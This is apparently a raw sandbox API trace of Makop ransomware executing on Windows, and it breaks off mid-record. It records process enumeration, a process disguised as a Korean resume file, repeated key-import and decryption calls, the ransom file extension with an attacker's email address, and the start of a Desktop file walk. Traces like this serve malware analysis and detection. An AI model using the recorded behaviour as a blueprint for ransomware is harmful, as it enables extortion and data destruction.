Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0127.373] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0127.373] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mature.exe")) returned 1 [0127.374] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="vid fujitsu survive.exe")) returned 1 [0127.375] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0127.375] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0127.376] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0127.377] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe")) returned 1 [0127.377] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0127.378] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0127.379] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.379] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x89c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.380] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0127.380] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.381] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="wbengine.exe")) returned 1 [0127.382] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="vdsldr.exe")) returned 1 [0127.383] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="vds.exe")) returned 1 [0127.383] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="vds.exe")) returned 0 [0127.385] CloseHandle (hObject=0x10c) returned 1 [0127.385] GetProcessHeap () returned 0x550000 [0127.386] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56e260 | out: hHeap=0x550000) returned 1 [0127.386] GetProcessHeap () returned 0x550000 [0127.386] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x567fb8 | out: hHeap=0x550000) returned 1 [0127.386] GetProcessHeap () returned 0x550000 [0127.386] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566ac0 | out: hHeap=0x550000) returned 1 [0127.386] GetProcessHeap () returned 0x550000 [0127.386] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5680d0 | out: hHeap=0x550000) returned 1 [0127.386] GetProcessHeap () returned 0x550000 [0127.386] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566ae0 | out: hHeap=0x550000) returned 1 [0127.386] GetProcessHeap () returned 0x550000 [0127.386] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568008 | out: hHeap=0x550000) returned 1 [0127.386] GetProcessHeap () returned 0x550000 [0127.386] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566af0 | out: hHeap=0x550000) returned 1 [0127.386] GetProcessHeap () returned 0x550000 [0127.386] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568030 | out: hHeap=0x550000) returned 1 [0127.386] GetProcessHeap () returned 0x550000 [0127.386] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566b00 | out: hHeap=0x550000) returned 1 [0127.386] GetProcessHeap () returned 0x550000 [0127.386] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568148 | out: hHeap=0x550000) returned 1 [0127.386] GetProcessHeap () returned 0x550000 [0127.386] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566b10 | out: hHeap=0x550000) returned 1 [0127.386] GetProcessHeap () returned 0x550000 [0127.386] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b98 | out: hHeap=0x550000) returned 1 [0127.386] GetProcessHeap () returned 0x550000 [0127.386] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566b20 | out: hHeap=0x550000) returned 1 [0127.386] GetProcessHeap () returned 0x550000 [0127.386] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568bb8 | out: hHeap=0x550000) returned 1 [0127.386] GetProcessHeap () returned 0x550000 [0127.386] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566b30 | out: hHeap=0x550000) returned 1 [0127.386] GetProcessHeap () returned 0x550000 [0127.386] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568bd8 | out: hHeap=0x550000) returned 1 [0127.386] GetProcessHeap () returned 0x550000 [0127.386] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566b40 | out: hHeap=0x550000) returned 1 [0127.387] GetProcessHeap () returned 0x550000 [0127.387] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568198 | out: hHeap=0x550000) returned 1 [0127.387] GetProcessHeap () returned 0x550000 [0127.387] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566b50 | out: hHeap=0x550000) returned 1 [0127.387] GetProcessHeap () returned 0x550000 [0127.387] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568210 | out: hHeap=0x550000) returned 1 [0127.387] GetProcessHeap () returned 0x550000 [0127.387] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566b60 | out: hHeap=0x550000) returned 1 [0127.387] GetProcessHeap () returned 0x550000 [0127.387] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5699c8 | out: hHeap=0x550000) returned 1 [0127.387] GetProcessHeap () returned 0x550000 [0127.387] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566b70 | out: hHeap=0x550000) returned 1 [0127.387] GetProcessHeap () returned 0x550000 [0127.387] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568238 | out: hHeap=0x550000) returned 1 [0127.387] GetProcessHeap () returned 0x550000 [0127.387] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566b80 | out: hHeap=0x550000) returned 1 [0127.387] GetProcessHeap () returned 0x550000 [0127.387] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568260 | out: hHeap=0x550000) returned 1 [0127.387] GetProcessHeap () returned 0x550000 [0127.387] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566b90 | out: hHeap=0x550000) returned 1 [0127.387] GetProcessHeap () returned 0x550000 [0127.387] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0127.387] GetProcessHeap () returned 0x550000 [0127.387] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566ba0 | out: hHeap=0x550000) returned 1 [0127.387] GetProcessHeap () returned 0x550000 [0127.387] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568288 | out: hHeap=0x550000) returned 1 [0127.387] GetProcessHeap () returned 0x550000 [0127.387] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566bb0 | out: hHeap=0x550000) returned 1 [0127.388] GetProcessHeap () returned 0x550000 [0127.388] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568bf8 | out: hHeap=0x550000) returned 1 [0127.388] GetProcessHeap () returned 0x550000 [0127.388] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566bc0 | out: hHeap=0x550000) returned 1 [0127.388] GetProcessHeap () returned 0x550000 [0127.388] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56e680 | out: hHeap=0x550000) returned 1 [0127.388] GetProcessHeap () returned 0x550000 [0127.388] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566bd0 | out: hHeap=0x550000) returned 1 [0127.388] GetProcessHeap () returned 0x550000 [0127.388] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5682b0 | out: hHeap=0x550000) returned 1 [0127.388] GetProcessHeap () returned 0x550000 [0127.388] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566be0 | out: hHeap=0x550000) returned 1 [0127.388] GetProcessHeap () returned 0x550000 [0127.388] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568c18 | out: hHeap=0x550000) returned 1 [0127.388] GetProcessHeap () returned 0x550000 [0127.388] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566bf0 | out: hHeap=0x550000) returned 1 [0127.388] GetProcessHeap () returned 0x550000 [0127.388] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568c38 | out: hHeap=0x550000) returned 1 [0127.388] GetProcessHeap () returned 0x550000 [0127.388] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566c00 | out: hHeap=0x550000) returned 1 [0127.388] GetProcessHeap () returned 0x550000 [0127.388] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5682d8 | out: hHeap=0x550000) returned 1 [0127.388] GetProcessHeap () returned 0x550000 [0127.388] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566c10 | out: hHeap=0x550000) returned 1 [0127.388] GetProcessHeap () returned 0x550000 [0127.388] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568300 | out: hHeap=0x550000) returned 1 [0127.388] GetProcessHeap () returned 0x550000 [0127.388] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566c20 | out: hHeap=0x550000) returned 1 [0127.388] GetProcessHeap () returned 0x550000 [0127.388] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568c58 | out: hHeap=0x550000) returned 1 [0127.388] GetProcessHeap () returned 0x550000 [0127.388] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566c30 | out: hHeap=0x550000) returned 1 [0127.388] GetProcessHeap () returned 0x550000 [0127.388] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56e6b0 | out: hHeap=0x550000) returned 1 [0127.389] GetProcessHeap () returned 0x550000 [0127.389] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566c40 | out: hHeap=0x550000) returned 1 [0127.389] GetProcessHeap () returned 0x550000 [0127.389] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568c78 | out: hHeap=0x550000) returned 1 [0127.389] GetProcessHeap () returned 0x550000 [0127.389] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56ee80 | out: hHeap=0x550000) returned 1 [0127.389] GetProcessHeap () returned 0x550000 [0127.389] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568328 | out: hHeap=0x550000) returned 1 [0127.389] GetProcessHeap () returned 0x550000 [0127.389] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56ee90 | out: hHeap=0x550000) returned 1 [0127.389] GetProcessHeap () returned 0x550000 [0127.389] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568350 | out: hHeap=0x550000) returned 1 [0127.389] GetProcessHeap () returned 0x550000 [0127.389] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56eea0 | out: hHeap=0x550000) returned 1 [0127.389] GetProcessHeap () returned 0x550000 [0127.389] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568c98 | out: hHeap=0x550000) returned 1 [0127.389] GetProcessHeap () returned 0x550000 [0127.389] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56eeb0 | out: hHeap=0x550000) returned 1 [0127.389] GetProcessHeap () returned 0x550000 [0127.389] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568cb8 | out: hHeap=0x550000) returned 1 [0127.389] GetProcessHeap () returned 0x550000 [0127.389] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56eec0 | out: hHeap=0x550000) returned 1 [0127.389] GetProcessHeap () returned 0x550000 [0127.389] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568cd8 | out: hHeap=0x550000) returned 1 [0127.389] GetProcessHeap () returned 0x550000 [0127.389] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56eed0 | out: hHeap=0x550000) returned 1 [0127.389] GetProcessHeap () returned 0x550000 [0127.389] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568378 | out: hHeap=0x550000) returned 1 [0127.389] GetProcessHeap () returned 0x550000 [0127.389] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56eee0 | out: hHeap=0x550000) returned 1 [0127.389] GetProcessHeap () returned 0x550000 [0127.389] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568cf8 | out: hHeap=0x550000) returned 1 [0127.390] GetProcessHeap () returned 0x550000 [0127.390] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56eef0 | out: hHeap=0x550000) returned 1 [0127.390] GetProcessHeap () returned 0x550000 [0127.390] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568d18 | out: hHeap=0x550000) returned 1 [0127.390] GetProcessHeap () returned 0x550000 [0127.390] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56ef00 | out: hHeap=0x550000) returned 1 [0127.390] GetProcessHeap () returned 0x550000 [0127.390] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5683a0 | out: hHeap=0x550000) returned 1 [0127.390] GetProcessHeap () returned 0x550000 [0127.390] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56ef10 | out: hHeap=0x550000) returned 1 [0127.390] GetProcessHeap () returned 0x550000 [0127.390] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5683c8 | out: hHeap=0x550000) returned 1 [0127.390] GetProcessHeap () returned 0x550000 [0127.390] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56ef20 | out: hHeap=0x550000) returned 1 [0127.390] GetProcessHeap () returned 0x550000 [0127.390] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568d38 | out: hHeap=0x550000) returned 1 [0127.390] GetProcessHeap () returned 0x550000 [0127.390] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56ef30 | out: hHeap=0x550000) returned 1 [0127.390] GetProcessHeap () returned 0x550000 [0127.390] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568d58 | out: hHeap=0x550000) returned 1 [0127.390] GetProcessHeap () returned 0x550000 [0127.390] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56ef40 | out: hHeap=0x550000) returned 1 [0127.390] GetProcessHeap () returned 0x550000 [0127.390] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568d78 | out: hHeap=0x550000) returned 1 [0127.390] GetProcessHeap () returned 0x550000 [0127.390] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56ef50 | out: hHeap=0x550000) returned 1 [0127.390] GetProcessHeap () returned 0x550000 [0127.390] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x5683c8 [0127.390] CryptImportKey (in: hProv=0x564928, pbData=0x18fe80, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x5699c8) returned 1 [0127.390] CryptDecrypt (in: hKey=0x5699c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5683c8, pdwDataLen=0x18fee8 | out: pbData=0x5683c8, pdwDataLen=0x18fee8) returned 1 [0127.390] CryptDestroyKey (hKey=0x5699c8) returned 1 [0127.391] GetProcessHeap () returned 0x550000 [0127.391] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x5683a0 [0127.391] CryptImportKey (in: hProv=0x564928, pbData=0x18fe80, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x5699c8) returned 1 [0127.391] CryptDecrypt (in: hKey=0x5699c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5683a0, pdwDataLen=0x18fee8 | out: pbData=0x5683a0, pdwDataLen=0x18fee8) returned 1 [0127.391] CryptDestroyKey (hKey=0x5699c8) returned 1 [0127.391] GetProcessHeap () returned 0x550000 [0127.391] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x568378 [0127.391] CryptImportKey (in: hProv=0x564928, pbData=0x18fe80, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x5699c8) returned 1 [0127.391] CryptDecrypt (in: hKey=0x5699c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x568378, pdwDataLen=0x18fee8 | out: pbData=0x568378, pdwDataLen=0x18fee8) returned 1 [0127.391] CryptDestroyKey (hKey=0x5699c8) returned 1 [0127.391] GetProcessHeap () returned 0x550000 [0127.391] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d48 [0127.391] CryptImportKey (in: hProv=0x564928, pbData=0x18fe80, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x5699c8) returned 1 [0127.391] CryptDecrypt (in: hKey=0x5699c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d48, pdwDataLen=0x18fee8 | out: pbData=0x566d48, pdwDataLen=0x18fee8) returned 1 [0127.391] CryptDestroyKey (hKey=0x5699c8) returned 1 [0127.391] GetProcessHeap () returned 0x550000 [0127.391] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10838) returned 0x56f268 [0127.392] GetProcessHeap () returned 0x550000 [0127.392] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x100000) returned 0x2250020 [0127.393] wsprintfW (in: param_1=0x57f29a, param_2=".[%08X].[%s].%s" | out: param_1=".[4B2E4630].[akzhq530@protonmail.com].makop") returned 43 [0127.393] GetProcessHeap () returned 0x550000 [0127.393] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10058) returned 0x57faa8 [0127.393] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x402550, lpParameter=0x56f268, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x10c [0127.394] WaitForSingleObject (hHandle=0x10c, dwMilliseconds=0xffffffff) returned 0x0 [0128.617] CloseHandle (hObject=0x10c) returned 1 [0128.617] GetProcessHeap () returned 0x550000 [0128.617] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2250020 | out: hHeap=0x550000) returned 1 [0128.618] GetProcessHeap () returned 0x550000 [0128.618] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56f268 | out: hHeap=0x550000) returned 1 [0128.618] GetProcessHeap () returned 0x550000 [0128.618] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d48 | out: hHeap=0x550000) returned 1 [0128.618] GetProcessHeap () returned 0x550000 [0128.618] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568378 | out: hHeap=0x550000) returned 1 [0128.618] GetProcessHeap () returned 0x550000 [0128.618] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5683a0 | out: hHeap=0x550000) returned 1 [0128.618] GetProcessHeap () returned 0x550000 [0128.619] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5683c8 | out: hHeap=0x550000) returned 1 [0128.619] GetProcessHeap () returned 0x550000 [0128.619] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x5683c8 [0128.619] CryptImportKey (in: hProv=0x564928, pbData=0x18fe78, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x5699c8) returned 1 [0128.619] CryptDecrypt (in: hKey=0x5699c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5683c8, pdwDataLen=0x18fee8 | out: pbData=0x5683c8, pdwDataLen=0x18fee8) returned 1 [0128.619] CryptDestroyKey (hKey=0x5699c8) returned 1 [0128.619] GetProcessHeap () returned 0x550000 [0128.619] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x5683a0 [0128.619] CryptImportKey (in: hProv=0x564928, pbData=0x18fe78, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x5699c8) returned 1 [0128.619] CryptDecrypt (in: hKey=0x5699c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5683a0, pdwDataLen=0x18fee8 | out: pbData=0x5683a0, pdwDataLen=0x18fee8) returned 1 [0128.619] CryptDestroyKey (hKey=0x5699c8) returned 1 [0128.619] GetProcessHeap () returned 0x550000 [0128.619] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x568378 [0128.619] CryptImportKey (in: hProv=0x564928, pbData=0x18fe78, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x5699c8) returned 1 [0128.619] CryptDecrypt (in: hKey=0x5699c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x568378, pdwDataLen=0x18fee8 | out: pbData=0x568378, pdwDataLen=0x18fee8) returned 1 [0128.619] CryptDestroyKey (hKey=0x5699c8) returned 1 [0128.619] GetProcessHeap () returned 0x550000 [0128.619] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d48 [0128.619] CryptImportKey (in: hProv=0x564928, pbData=0x18fe78, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x5699c8) returned 1 [0128.619] CryptDecrypt (in: hKey=0x5699c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d48, pdwDataLen=0x18fee8 | out: pbData=0x566d48, pdwDataLen=0x18fee8) returned 1 [0128.619] CryptDestroyKey (hKey=0x5699c8) returned 1 [0128.620] GetProcessHeap () returned 0x550000 [0128.620] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x4) returned 0x566c40 [0128.620] GetProcessHeap () returned 0x550000 [0128.620] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x4) returned 0x566c30 [0128.620] GetProcessHeap () returned 0x550000 [0128.620] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10838) returned 0x56f268 [0128.620] GetProcessHeap () returned 0x550000 [0128.620] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x100000) returned 0x2250020 [0128.620] wsprintfW (in: param_1=0x57f29a, param_2=".[%08X].[%s].%s" | out: param_1=".[4B2E4630].[akzhq530@protonmail.com].makop") returned 43 [0128.620] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x402550, lpParameter=0x56f268, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x10c [0128.621] WaitForMultipleObjects (nCount=0x1, lpHandles=0x566c30*=0x10c, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0xab8 Thread: id = 41 os_tid = 0x94c Thread: id = 42 os_tid = 0x95c Thread: id = 140 os_tid = 0xb0 [0127.401] GetProcessHeap () returned 0x550000 [0127.401] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x5c) returned 0x569b50 [0127.401] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*", lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe6071c00, ftLastAccessTime.dwHighDateTime=0x1d63e6c, ftLastWriteTime.dwLowDateTime=0xe6071c00, ftLastWriteTime.dwHighDateTime=0x1d63e6c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xffff, cFileName=".", cAlternateFileName="")) returned 0x5699c8 [0127.401] GetProcessHeap () returned 0x550000 [0127.401] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569b50 | out: hHeap=0x550000) returned 1 [0127.401] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe6071c00, ftLastAccessTime.dwHighDateTime=0x1d63e6c, ftLastWriteTime.dwLowDateTime=0xe6071c00, ftLastWriteTime.dwHighDateTime=0x1d63e6c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xffff, 